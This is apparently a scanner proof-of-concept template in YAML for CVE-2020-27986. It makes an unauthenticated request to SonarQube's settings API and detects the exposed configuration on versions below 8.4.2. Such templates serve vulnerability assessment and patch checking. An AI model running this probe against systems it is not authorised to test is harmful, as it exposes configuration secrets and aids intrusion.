name: poc-yaml-sonarqube-cve-2020-27986-unauth
rules:
  - method: GET
    path: "/api/settings/values"
    expression: |
      response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(bytes(string(b"sonaranalyzer-cs.nuget.packageVersion"))) && response.body.bcontains(bytes(string(b"sonar.core.id")))
detail:
  author: pa55w0rd(www.pa55w0rd.online/)
  Affected Version: "sonarqube < 8.4.2.36762"
  links:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-27986